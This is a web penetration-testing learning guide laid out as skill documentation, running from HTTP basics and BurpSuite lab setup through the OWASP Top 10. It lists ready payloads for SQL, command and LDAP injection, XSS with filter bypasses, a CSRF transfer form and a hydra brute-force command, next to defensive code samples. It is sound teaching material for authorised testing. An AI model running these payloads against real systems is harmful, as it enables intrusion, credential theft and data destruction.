pentesting from beginner to advanced

📁 zebbern/secops-cli-guides 📅 Jan 1, 1970
Install command
npx skills add https://github.com/zebbern/secops-cli-guides --skill Pentesting from Beginner to Advanced

Skill documentation

Pentesting from Beginner to Advanced

Purpose

Provide a structured learning path for web application penetration testing, progressing from foundational concepts through advanced exploitation techniques. Guide learners through each phase of the web security assessment process.

Inputs/Prerequisites

  • Basic computer and networking knowledge
  • Kali Linux or security-focused OS
  • BurpSuite installed and configured
  • Lab environment (bWAPP, DVWA, or similar)
  • Web browser with developer tools

Outputs/Deliverables

  • Foundational web security knowledge
  • Practical exploitation skills
  • Understanding of OWASP Top 10
  • Ability to conduct web application assessments
  • Vulnerability identification and reporting skills

Core Workflow

Phase 1: History and Fundamentals

Understanding the Internet:

  • Learn how the internet was developed
  • Understand client-server architecture
  • Grasp basic web communication models

Key Concepts:

  • HTTP protocol fundamentals
  • Request/response structure
  • Client vs server-side processing

Phase 2: Web and Server Technology

HTTP Protocol Basics:

HTTP Request Structure:
GET /page HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Accept: text/html
Cookie: session=abc123

HTTP Response Structure:
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: session=xyz789

<html>...</html>

Essential Concepts:

  • HTTP Methods: GET, POST, PUT, DELETE, OPTIONS
  • Status Codes: 200 OK, 301 Moved Permanently (redirect), 403 Forbidden, 404 Not Found, 500 Internal Server Error
  • Headers: request and response metadata
  • Cookies: session management, tracking
  • Sessions: server-side state management
  • URLs: structure and parameters
  • REST APIs: resource-based web services
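To make the request structure above concrete, here is a small parser, added as an example and not code from the guide, that pulls the method, path, query parameters, headers and cookies out of a raw request. Those are exactly the entry points Phase 4 later asks you to identify. The sample request is constructed from the one shown above, with a query string added.

```python
from urllib.parse import parse_qs, urlsplit

def parse_http_request(raw: str) -> dict:
    """Parse a raw HTTP/1.x request into its parts (headers only; the body is returned untouched)."""
    # Accept CRLF or bare LF line endings so text captured in Burp pastes straight in
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    request_line = lines[0].split(" ")
    if len(request_line) != 3:
        raise ValueError("malformed request line: %r" % lines[0])
    method, target, version = request_line
    headers = {}
    for line in lines[1:]:
        if not line:
            continue
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError("malformed header line: %r" % line)
        # Header names are case-insensitive, so normalise them to lower case
        headers[name.strip().lower()] = value.strip()
    # Cookie header has the form "name=value; name2=value2"
    cookies = {}
    for pair in headers.get("cookie", "").split(";"):
        name, sep, value = pair.strip().partition("=")
        if sep:
            cookies[name] = value
    url = urlsplit(target)
    return {
        "method": method,
        "path": url.path,
        "params": parse_qs(url.query),   # URL parameters: an entry point for testing
        "version": version,
        "headers": headers,               # headers such as User-Agent are entry points too
        "cookies": cookies,
        "body": body,
    }

# Constructed sample: the request shown in the guide, plus a query string
SAMPLE_REQUEST = (
    "GET /page?q=test&page=2 HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Accept: text/html\r\n"
    "Cookie: session=abc123\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for key, value in parse_http_request(SAMPLE_REQUEST).items():
        print(key, "=", value)
```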

Encoding Types:

# URL Encoding
Space -> %20
< -> %3C
> -> %3E
" -> %22

# HTML Encoding
< -> &lt;
> -> &gt;
& -> &amp;

# Base64 Encoding
echo "text" | base64
echo "dGV4dAo=" | base64 -d

Phase 3: Lab Setup with BurpSuite

Install BurpSuite:

# Download from PortSwigger
# Configure browser proxy: 127.0.0.1:8080
# Import Burp CA certificate

Configure Browser:

  1. Set proxy to 127.0.0.1:8080
  2. Import BurpSuite CA certificate
  3. Disable certificate validation for testing

BurpSuite Modules:

  • Proxy: intercept and modify traffic
  • Repeater: manually modify and resend requests
  • Intruder: automated attacks and fuzzing
  • Scanner: automated vulnerability detection
  • Decoder: encode/decode data
  • Comparer: compare responses
  • Sequencer: analyze session token randomness

Set Up Practice Lab:

# Install Docker
apt install docker.io

# Run bWAPP (published on host port 8081 so it does not clash with DVWA or with Burp's listener on 8080)
docker run -d -p 8081:80 raesene/bwapp

# Run DVWA (host port 8082 for the same reason)
docker run -d -p 8082:80 vulnerables/web-dvwa

# Access bWAPP at http://localhost:8081 and DVWA at http://localhost:8082

Phase 4: Application Mapping

Discovery Techniques:

# Robots.txt analysis
curl http://target/robots.txt

# Directory brute forcing
gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
dirbuster -u http://target -l /usr/share/wordlists/dirb/common.txt

# Spidering with Burp
# Use Target > Site Map > Spider

Entry Point Identification:

  • Forms and input fields
  • URL parameters
  • Hidden fields
  • Cookies
  • HTTP headers

Technology Fingerprinting:

# Whatweb
whatweb http://target

# Wappalyzer (browser extension)

# Nmap fingerprinting
nmap -sV --script http-enum target

# Banner grabbing
curl -I http://target

Phase 5: OWASP Top 10 Vulnerabilities

1. Injection (A03:2021)

# SQL Injection
' OR 1=1--
" OR ""="
'; DROP TABLE users;--

# Command Injection
; ls -la
| cat /etc/passwd
&& whoami

# LDAP Injection
*)(uid=*))(|(uid=*
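To see why the first SQL injection payload above works, and what the fix looks like, here is an added example (not code from the guide) that runs the same login query both ways against a constructed in-memory SQLite table: once built by string concatenation, once with bound parameters.

```python
import sqlite3

def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory users table (plaintext passwords only to keep the demo short)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "s3cret"), (2, "alice", "hunter2")])
    return con

def login_vulnerable(con, username: str, password: str) -> list:
    """String concatenation: the user's input becomes part of the SQL grammar."""
    query = ("SELECT id, username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    # With username = "' OR 1=1--" this becomes:
    #   ... WHERE username = '' OR 1=1--' AND password = '...'
    # and everything after -- is a comment, so every row matches.
    return con.execute(query).fetchall()

def login_safe(con, username: str, password: str) -> list:
    """Parameterised query: the input is bound as data and cannot change the query structure."""
    query = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return con.execute(query, (username, password)).fetchall()

PAYLOAD = "' OR 1=1--"   # the first SQL injection payload listed above

if __name__ == "__main__":
    con = make_demo_db()
    print("vulnerable:", login_vulnerable(con, PAYLOAD, "anything"))  # every user row
    print("safe:      ", login_safe(con, PAYLOAD, "anything"))        # no rows
```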

2. Broken Authentication (A07:2021)

- Weak passwords
- Session fixation
- Credential stuffing
- Missing MFA
- Insecure password recovery

3. Cross-Site Scripting (A03:2021)

<!-- Reflected XSS -->
<script>alert('XSS')</script>

<!-- Stored XSS -->
<img src=x onerror="alert('XSS')">

<!-- DOM-based XSS -->
<svg onload="alert('XSS')">

<!-- Filter bypass -->
<ScRiPt>alert('XSS')</ScRiPt>
<img src="x" onerror="alert('XSS')">
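The encoding table in Phase 2 and the XSS payloads above are two sides of the same point: a value must be encoded for the context it lands in. This added example (not the guide's code) reflects a search term into a page once unencoded and once with HTML encoding for the text context and URL encoding for a query parameter, using only the standard library.

```python
import html
from urllib.parse import quote

XSS_PAYLOAD = "<script>alert('XSS')</script>"   # reflected XSS payload from the guide

def encode_for_html(value: str) -> str:
    """HTML-encode for an HTML body or a quoted attribute: < > & " ' all become entities."""
    return html.escape(value, quote=True)

def encode_for_url(value: str) -> str:
    """Percent-encode for use as a URL query value (safe="" so even '/' is encoded)."""
    return quote(value, safe="")

def render_results_vulnerable(term: str) -> str:
    # The search term is reflected straight into the page: a classic reflected XSS sink
    return "<p>Results for: " + term + "</p>"

def render_results_safe(term: str) -> str:
    # Encode once per context: HTML text for the paragraph, URL encoding for the link.
    # The percent-encoded value contains only %XX and alphanumerics, so it needs no
    # further attribute encoding inside href="...".
    return ('<p>Results for: ' + encode_for_html(term) + '</p>'
            '<a href="/search?q=' + encode_for_url(term) + '">permalink</a>')

if __name__ == "__main__":
    print(render_results_vulnerable(XSS_PAYLOAD))
    print(render_results_safe(XSS_PAYLOAD))
```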

4. Insecure Direct Object Reference (A01:2021)

# IDOR Examples
/api/user/123    -> /api/user/124
/download?id=1   -> /download?id=2
/invoice/10001   -> /invoice/10002

5. Security Misconfiguration (A05:2021)

- Default credentials
- Unnecessary features enabled
- Error messages revealing info
- Missing security headers
- Outdated software

6. Sensitive Data Exposure (A02:2021)

- Unencrypted transmission
- Weak encryption
- Exposed API keys
- Hardcoded credentials
- Information in error messages

7. Missing Access Controls (A01:2021)

- Horizontal privilege escalation
- Vertical privilege escalation
- Forced browsing to admin pages
- API without authentication

8. Cross-Site Request Forgery (A01:2021)

<!-- CSRF Attack Form -->
<form action="http://target/transfer" method="POST">
  <input type="hidden" name="amount" value="10000">
  <input type="hidden" name="to" value="attacker">
  <input type="submit" value="Click Me!">
</form>
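What stops the form above from working is a server-side check that the request came from the application's own page. This added example (not the guide's code) shows the two usual defences: an origin check on the Origin/Referer header and a per-session anti-CSRF token compared in constant time. The origin https://target.example and the sample requests are constructed for the demo.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://target.example"   # assumed origin of the protected application

def issue_csrf_token(session: dict) -> str:
    """Create an unguessable per-session token and keep it server-side."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

def verify_csrf(session: dict, headers: dict, form: dict):
    """Return (accepted, reason) for a state-changing POST."""
    # Check 1: the request must come from our own origin (Origin, or Referer as a fallback)
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False, "no Origin or Referer header"
    parts = urlsplit(source)
    if parts.scheme + "://" + parts.netloc != SITE_ORIGIN:
        return False, "cross-site source: " + source
    # Check 2: the form must carry this session's token; compare in constant time
    expected = session.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, form.get("csrf_token", "")):
        return False, "missing or wrong CSRF token"
    return True, "ok"

def demo():
    """Constructed samples: the attacker's form above, submitted from another site
    without a token, and a legitimate submission from the application's own page."""
    session = {}
    token = issue_csrf_token(session)
    forged = verify_csrf(session, {"Origin": "https://evil.example"},
                         {"amount": "10000", "to": "attacker"})
    legit = verify_csrf(session, {"Origin": SITE_ORIGIN},
                        {"amount": "50", "to": "alice", "csrf_token": token})
    return forged, legit

if __name__ == "__main__":
    print(demo())
```

The SameSite cookie attribute covered in Phase 6 is the complementary browser-side control; the token check still matters for browsers and flows where SameSite does not apply.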

9. Components with Known Vulnerabilities (A06:2021)

# Check for CVEs
searchsploit apache 2.4
searchsploit wordpress 5.0

# Retire.js for JavaScript
retire --path /path/to/js

10. Insufficient Logging (A09:2021)

- Failed login attempts not logged
- No audit trail
- Logs not monitored
- Logs stored insecurely

Phase 6: Session Management Testing

Session Analysis:

# Burp Sequencer
# Analyze token randomness and predictability

# Check for:
- Session fixation
- Session hijacking
- Weak session tokens
- Missing timeout
- Insecure transmission
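Sequencer's core idea can be reproduced in a few lines. This added example (not the guide's or PortSwigger's code) estimates the entropy of a sampled token set position by position, lists positions that never change, and flags tokens that are a hex counter in disguise. The two token sets are constructed; with only four samples the estimate caps at 2 bits per position, so a real assessment needs thousands of tokens.

```python
import math
from collections import Counter

def entropy_bits(symbols) -> float:
    """Shannon entropy of the observed symbol distribution, in bits."""
    counts = Counter(symbols)
    total = len(symbols)
    return -sum(c / total * math.log2(c / total) for c in counts.values())

def analyse_tokens(tokens: list) -> dict:
    """Position-wise entropy plus a sequential-counter check over a sample of session tokens."""
    width = min(len(t) for t in tokens)
    per_position = [entropy_bits([t[i] for t in tokens]) for i in range(width)]
    # Positions that are identical in every sample contribute nothing to unpredictability
    fixed = [i for i, e in enumerate(per_position) if e == 0.0]
    sequential = False
    try:
        values = [int(t, 16) for t in tokens]
        # A single distinct delta between consecutive tokens means a plain counter
        sequential = len({b - a for a, b in zip(values, values[1:])}) == 1
    except ValueError:
        pass   # not hex, so the counter check does not apply
    return {"estimated_bits": round(sum(per_position), 2),
            "fixed_positions": fixed,
            "sequential": sequential}

# Constructed samples: a counter-based token set and a handful of random-looking ones
PREDICTABLE = ["00000000000004d2", "00000000000004d3",
               "00000000000004d4", "00000000000004d5"]
RANDOM_LOOKING = ["3f9a1c7e8b2d4065", "a71e02c9d5f4b83e",
                  "0c4d9e2a7b61f5c8", "e8b3d06f2a9c47d1"]

if __name__ == "__main__":
    print("predictable:", analyse_tokens(PREDICTABLE))
    print("random-looking:", analyse_tokens(RANDOM_LOOKING))
```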

Cookie Security Flags:

Set-Cookie: session=abc123; Secure; HttpOnly; SameSite=Strict
  • Secure: HTTPS only
  • HttpOnly: no JavaScript access
  • SameSite: CSRF protection
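Checking these flags by eye across many responses is error-prone, so here is an added example (not the guide's code) that parses Set-Cookie values and reports which of the three flags are missing, and why that matters. The sample headers are constructed; the first is the one shown above.

```python
def audit_set_cookie(header_value: str) -> dict:
    """Audit one Set-Cookie value for Secure, HttpOnly and SameSite and return the findings."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name = parts[0].partition("=")[0]
    attrs = {}
    for attribute in parts[1:]:
        key, _, value = attribute.partition("=")
        # Attribute names and the SameSite value are case-insensitive
        attrs[key.strip().lower()] = value.strip().lower()
    findings = []
    if "secure" not in attrs:
        findings.append("Secure missing: cookie will also be sent over plain HTTP")
    if "httponly" not in attrs:
        findings.append("HttpOnly missing: readable by JavaScript, so XSS can steal it")
    samesite = attrs.get("samesite", "")
    if samesite not in ("strict", "lax"):
        findings.append("SameSite not Strict/Lax: cross-site requests will carry the cookie")
    if samesite == "none" and "secure" not in attrs:
        findings.append("SameSite=None requires Secure; browsers reject this combination")
    return {"name": name, "findings": findings}

def audit_all(headers: list) -> list:
    """Audit every Set-Cookie value seen in a response."""
    return [audit_set_cookie(h) for h in headers]

# Constructed samples: the header from the guide, a cookie with no flags, and a
# cookie that is Secure but still script-readable and sent cross-site
SAMPLE_HEADERS = [
    "session=abc123; Secure; HttpOnly; SameSite=Strict",
    "legacy=abc123; Path=/",
    "tracker=1; Secure; SameSite=None",
]

if __name__ == "__main__":
    for result in audit_all(SAMPLE_HEADERS):
        print(result["name"], "->", result["findings"] or "ok")
```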

Phase 7: Bypassing Client-Side Controls

Hidden Field Manipulation:

<!-- Original -->
<input type="hidden" name="price" value="100">

<!-- Modified in Burp -->
<input type="hidden" name="price" value="1">

JavaScript Validation Bypass:

  • Disable JavaScript in browser
  • Intercept and modify with Burp
  • Replay requests with modified values

Phase 8: Authentication Attacks

Common Techniques:

# Brute force
hydra -l admin -P passwords.txt target http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"

# Username enumeration
# Different responses for valid/invalid users

# Password reset flaws
# Predictable tokens, no rate limiting

Phase 9: Access Control Testing

IDOR Testing:

# Increment IDs
/user/1 -> /user/2

# Change parameters
?role=user -> ?role=admin

# Use Burp Intruder for automation
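The hidden price field in Phase 7 and the ?role=admin and incremented-ID tests above all probe the same weakness: the server trusting a value the client controls. This added example (not the guide's code) shows a checkout and an invoice lookup written both ways, with prices, roles and ownership taken from constructed server-side stores in the hardened versions.

```python
CATALOG = {"sku-100": 100.00, "sku-200": 250.00}   # constructed server-side price list
USER_ROLES = {"alice": "user", "bob": "admin"}      # constructed server-side role store
INVOICE_OWNER = {10001: "alice", 10002: "bob"}      # constructed invoice id -> owner

def order_total_vulnerable(form: dict) -> float:
    """Trusts the hidden 'price' field, which the user can rewrite in Burp Proxy."""
    return float(form["price"]) * int(form["qty"])

def order_total_safe(form: dict) -> float:
    """Takes only the product id and quantity from the client; the price is looked up server-side."""
    qty = int(form["qty"])
    if qty < 1:
        raise ValueError("quantity must be positive")
    if form["sku"] not in CATALOG:
        raise ValueError("unknown product")
    return CATALOG[form["sku"]] * qty

def can_view_invoice_vulnerable(session_user: str, form: dict, invoice_id: int) -> bool:
    """Honours ?role=admin from the request: vertical privilege escalation in one parameter."""
    return form.get("role") == "admin" or INVOICE_OWNER.get(invoice_id) == session_user

def can_view_invoice_safe(session_user: str, form: dict, invoice_id: int) -> bool:
    """Role comes from the server-side store; ownership is checked per object, so
    incrementing the invoice id (IDOR) only works for an admin."""
    role = USER_ROLES.get(session_user, "user")
    owner = INVOICE_OWNER.get(invoice_id)
    if owner is None:
        return False
    return role == "admin" or owner == session_user

if __name__ == "__main__":
    tampered = {"sku": "sku-100", "price": "1", "qty": "1"}   # price edited from 100 to 1
    print("vulnerable total:", order_total_vulnerable(tampered))
    print("safe total:      ", order_total_safe(tampered))
    print("alice, ?role=admin, invoice 10002:",
          can_view_invoice_vulnerable("alice", {"role": "admin"}, 10002),
          can_view_invoice_safe("alice", {"role": "admin"}, 10002))
```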

Phase 10: Input Validation Testing

Injection Points:

# All user input
# URL parameters
# Form fields
# Headers (User-Agent, Referer)
# Cookies
# File uploads

Fuzzing with Burp:

  1. Send request to Intruder
  2. Mark injection points
  3. Select payload list
  4. Analyze responses

Phase 11: Error Code Analysis

# Force errors for information
- Invalid input types
- Long strings
- Special characters
- SQL syntax errors

# Look for:
- Stack traces
- Database errors
- Path disclosure
- Version information

Phase 12: Cryptography Testing

# Check for:
- Weak algorithms (MD5, SHA1, DES)
- ECB mode usage
- Hardcoded keys
- Missing encryption

# SSL/TLS testing
sslscan target:443
testssl.sh target
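ECB mode is detectable from ciphertext alone because identical plaintext blocks produce identical ciphertext blocks. This added example (not the guide's code) encrypts a repetitive message in ECB and in CBC and counts repeated 16-byte blocks. To keep it runnable without third-party libraries it uses a keyed hash as a stand-in block function; it is not a real cipher, but it has the one property the detection relies on, and the same check works unchanged on real AES output.

```python
import hashlib

BLOCK = 16

def toy_block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for a block cipher (NOT a real cipher): a keyed, deterministic
    16-byte function of the block, which is all ECB detection depends on."""
    return hashlib.sha256(key + block).digest()[:BLOCK]

def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def encrypt_ecb(key: bytes, data: bytes) -> bytes:
    """Each block is encrypted independently, so equal plaintext blocks repeat in the output."""
    data = pkcs7_pad(data)
    return b"".join(toy_block_encrypt(key, data[i:i + BLOCK])
                    for i in range(0, len(data), BLOCK))

def encrypt_cbc(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Each block is XORed with the previous ciphertext block first, so the repeats vanish."""
    data = pkcs7_pad(data)
    previous, out = iv, []
    for i in range(0, len(data), BLOCK):
        mixed = bytes(a ^ b for a, b in zip(data[i:i + BLOCK], previous))
        previous = toy_block_encrypt(key, mixed)
        out.append(previous)
    return b"".join(out)

def repeated_blocks(ciphertext: bytes) -> int:
    """Number of 16-byte blocks that duplicate an earlier one; anything above 0 is the ECB tell-tale."""
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    return len(blocks) - len(set(blocks))

def looks_like_ecb(ciphertext: bytes) -> bool:
    return repeated_blocks(ciphertext) > 0

# Constructed sample: a highly repetitive plaintext, like a form field padded with 'A's
KEY = b"constructed-demo-key-not-secret!"
IV = bytes(BLOCK)
PLAINTEXT = b"A" * 64

if __name__ == "__main__":
    print("ECB repeated blocks:", repeated_blocks(encrypt_ecb(KEY, PLAINTEXT)))
    print("CBC repeated blocks:", repeated_blocks(encrypt_cbc(KEY, IV, PLAINTEXT)))
```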

Phase 13: Business Logic Vulnerabilities

Common Issues:

  • Price manipulation
  • Skipping workflow steps
  • Race conditions
  • Abuse of functionality

Testing Approach:

  1. Understand normal workflow
  2. Attempt to skip steps
  3. Modify values mid-process
  4. Test race conditions

Quick Reference

Essential Tools

  • BurpSuite: web proxy and testing
  • OWASP ZAP: open source alternative
  • sqlmap: SQL injection automation
  • Nikto: web server scanning
  • Gobuster: directory enumeration

Testing Checklist

□ Map application and entry points
□ Test authentication mechanisms
□ Check authorization controls
□ Test input validation
□ Analyze session management
□ Check for injection flaws
□ Test business logic
□ Review error handling
□ Assess cryptographic implementation

Constraints

  • Only test authorized systems
  • Lab environments are essential for learning
  • Real-world applications may differ from labs
  • Tools require understanding, not just execution

Examples

Example 1: Quick XSS Test

<script>alert(document.domain)</script>

Example 2: SQLi Detection

' OR '1'='1

Troubleshooting

  • Burp not intercepting: check proxy settings and the CA certificate
  • Lab not loading: verify Docker is running
  • Payloads blocked: try encoding or alternative syntax
  • Tool errors: check dependencies and permissions